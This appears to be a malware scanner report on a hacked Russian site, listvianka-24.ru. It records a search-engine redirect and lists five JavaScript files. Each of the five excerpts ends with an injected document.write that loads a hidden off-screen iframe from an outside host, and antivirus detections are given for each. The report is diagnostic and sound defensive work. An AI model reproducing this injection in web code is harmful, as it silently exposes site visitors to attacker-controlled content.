New scan:

Malware Scanner report for listvianka-24.ru

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://site.portrelay.com/
1932 websites infected.

The website "listvianka-24.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://listvianka-24.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: listvianka-24.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 11 Sep 2014 16:16:22 GMT
Location: http://site.portrelay.com/
Server: nginx/1.6.0
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
malicious

Scanned pages/files

RequestServer responseStatus
http://listvianka-24.ru/
200 OK
Content-Length: 49623
Content-Type: text/html
clean
http://listvianka-24.ru/plugins/system/jbLibrary/jquery-1.3.2.min.js
200 OK
Content-Length: 57431
Content-Type: application/x-javascript
clean
http://listvianka-24.ru/plugins/system/jbLibrary/jquery.lazyload.js
200 OK
Content-Length: 2336
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){$.fn.lazyload=function(options){var settings={threshold:0,failurelimit:0,event:"scroll",effect:"show",container:window};if(options){$.extend(settings,options);}
var elements=this;if("scroll"==settings.event){$(settings.container).bind("scroll",function(event){var counter=0;elements.each(function(){if(!$.belowthefold(this,settings)&&!$.rightoffold(this,settings)){$(this).trigger("appear");}else{if(counter++>settings.failurelimit){return false;}}});var temp=$.grep(eleme
... 1407 bytes are skipped ...
pr[':'],{"below-the-fold":"$.belowthefold(a, {threshold : 0, container: window})","above-the-fold":"!$.belowthefold(a, {threshold : 0, container: window})","right-of-fold":"$.rightoffold(a, {threshold : 0, container: window})","left-of-fold":"!$.rightoffold(a, {threshold : 0, container: window})"});})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://scqhdbmnq.qhigh.com/161ded797675089541811353c612.AZyEh?13" height="500" width="500"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://listvianka-24.ru/media/system/js/caption.js
200 OK
Content-Length: 1898
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 390 bytes are skipped ...
container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://scqhdbmnq.qhigh.com/161ded797675089541811353c612.AZyEh?13" height="500" width="500"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://listvianka-24.ru/media/system/js/modal.js
200 OK
Content-Length: 10729
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var SqueezeBox = {
presets: {
size: {x: 600, y: 450},
sizeLoading: {x: 200, y: 150},
marginInner: {x: 20, y: 20},
marginImage: {x: 150, y: 200},
handler: false,
adopt: null,
closeWithOverlay: true,
zIndex: 65555,
overlayOpacity: 0.7,
classWindow: '',
classOverlay: '',
disableFx: false,
onOpen: Class.empty,
onClose: Class.empty,
onUpdate: Class.empty,
onResize: Class.empty,
onMove: Class.emp
... 3592 bytes are skipped ...
/> 'width': this.options.size.x,
'height': this.options.size.y
});
},
'string': function(str) {
return str;
}
},
extend: $extend
};
SqueezeBox.extend(Events.prototype);
SqueezeBox.extend(Options.prototype);
SqueezeBox.extend(Chain.prototype);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://scqhdbmnq.qhigh.com/161ded797675089541811353c612.AZyEh?13" height="500" width="500"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://listvianka-24.ru/templates/jblandscape/js/superfish.js
200 OK
Content-Length: 2917
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){$.fn.superfish=function(op){var sf=$.fn.superfish,c=sf.c,$arrow=$(['<span class="',c.arrowClass,'"></span>'].join('')),over=function(){var $$=$(this),menu=getMenu($$);clearTimeout(menu.sfTimer);$$.showSuperfishUl().siblings().hideSuperfishUl()},out=function(){var $$=$(this),menu=getMenu($$),o=sf.op;clearTimeout(menu.sfTimer);menu.sfTimer=setTimeout(function(){o.retainPath=($.inArray($$[0],o.$path)>-1);$$.hideSuperfishUl();if(o.$path.length&&$$.parents(['li.',
... 2018 bytes are skipped ...
rn this},showSuperfishUl:function(){var o=sf.op,sh=sf.c.shadowClass+'-off',$ul=this.addClass(o.hoverClass).find('>ul:hidden').css('visibility','visible');sf.IE7fix.call($ul);o.onBeforeShow.call($ul);$ul.animate(o.animation,o.speed,function(){sf.IE7fix.call($ul);o.onShow.call($ul)});return this}})})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://scqhdbmnq.qhigh.com/161ded797675089541811353c612.AZyEh?13" height="500" width="500"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Norman
IframeRef.DL

http://listvianka-24.ru/templates/jblandscape/js/accordionMenu.js
200 OK
Content-Length: 4395
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function(){jQuery('#menu li ul').hide();var cookieValue=jQuery.cookie('menuCookie')||'';jQuery('#menu > li > span').each(function(index){var $this=jQuery(this),$checkElement=$this.next('ul');if(cookieValue.indexOf(bigIndex(index))>-1){$checkElement.show()}$this.click(function(){if($checkElement.is(':hidden')){$checkElement.slideDown("fast");cookieValue=cookieValue+bigIndex(index);jQuery.cookie('menuCookie',cookieValue)}else{$checkElement.slideUp();cookieValue=cook
... 2981 bytes are skipped ...
{var offsetParent=this[0].offsetParent;while(offsetParent&&(!/^body|html$/i.test(offsetParent.tagName)&&$.css(offsetParent,'position')=='static'))offsetParent=offsetParent.offsetParent;return $(offsetParent)}});function num(el,prop){return parseInt($.css(el.jquery?el[0]:el,prop))||0}})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://scqhdbmnq.qhigh.com/161ded797675089541811353c612.AZyEh?13" height="500" width="500"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Norman
IframeRef.DL

http://listvianka-24.ru/index.php?option=com_content&view=article&id=47&Itemid=62
200 OK
Content-Length: 43636
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_contact&view=category&catid=12&Itemid=55
200 OK
Content-Length: 44822
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=categories&Itemid=61
200 OK
Content-Length: 44440
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=category&id=1:2010-05-27-04-43-42&Itemid=61
200 OK
Content-Length: 57613
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=detail&catid=1:2010-05-27-04-43-42&id=1:lis-2&tmpl=component&Itemid=61
200 OK
Content-Length: 11366
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=detail&catid=1:2010-05-27-04-43-42&id=1:lis-2&phocaslideshow=1&tmpl=component&Itemid=61
200 OK
Content-Length: 11315
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=detail&catid=1:2010-05-27-04-43-42&id=1:lis-2&tmpl=component&phocaslideshow=0&Itemid=61
200 OK
Content-Length: 11366
Content-Type: text/html
clean
http://listvianka-24.ru/index.php?option=com_phocagallery&view=detail&catid=1:2010-05-27-04-43-42&id=2:lis-10&tmpl=component&Itemid=61
200 OK
Content-Length: 11576
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=listvianka-24.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://listvianka-24.ru/

Result: listvianka-24.ru is not infected or malware details are not published yet.